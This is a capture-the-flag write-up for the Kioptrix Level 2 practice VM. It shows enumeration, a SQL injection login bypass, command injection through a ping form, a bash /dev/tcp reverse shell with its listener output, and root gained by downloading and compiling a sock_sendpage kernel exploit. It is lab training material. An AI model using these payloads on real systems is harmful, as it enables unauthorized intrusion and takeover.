Dhruv Ambaliya
- Author Description
- Service Enumeration
- Web Application Investigation
- Non privileged shell
- Local privilege Escalation
Author Description
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
Service Enumeration
| Port | Service | Version Detection |
|---|---|---|
|
|
SSH |
OpenSSH 3.9p1 (protocol 1.99) |
|
|
HTTP |
Apache httpd 2.0.52 ((CentOS)) |
|
|
RPC Bind |
N/A |
|
|
HTTPS |
Apache httpd 2.0.52 ((CentOS)) |
|
|
CUPS |
CUPS 1.1 |
|
|
RPC |
RPC |
|
|
MySQL |
MySQL (unauthorized) |
Web Application Investigation
The web form /index.php was vulnerable to SQL injection, entering the username admin and the password ' or '1'=' successfully bypassed auth.
SQL Injection - Why does ' or '1'='1 work ?
The web application is expecting the SQL query:
$query = "SELECT * FROM users WHERE username = 'admin' AND password='blah'";
Entering the above injects the statement after the password='blah' and before the closing ";, the entire sql injection query looks like:
$query = "SELECT * FROM users WHERE username = 'admin' AND password=' or '1'='1";"
1 = 1 will always be 1, thus the statement will return true, allowing an attacker to authenticate as admin. The above injection statement correctly closes the sql syntax, however it is possible to comment out the rest of the sql statement using: -- -
The above authentication bypass exposed a web form vulnerable to command injection, the form filtering only checks for the presence of the ping command with no filtering to prevent an attacker tacking a comment on the end using ; insert-command-here.
Non privileged shell
A non privileged reverse shell was obtained using:
ping google.com; bash -i >& /dev/tcp/192.168.221.139/443 0>&1[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.157] 32770
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$Local privilege Escalation
bash-3.00$ uname -ar
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9545 --no-check-certificate
--02:27:58-- https://www.exploit-db.com/download/9545
=> `9545'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
0K ......... 30.10 MB/s
02:27:58 (30.10 MB/s) - `9545' saved [9785]
bash-3.00$ mv 9545 sock_sendpage.c
bash-3.00$ gcc -o sock_sendpage sock_sendpage.c
bash-3.00$ ./sock_sendpage
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#Thanks for the VM :)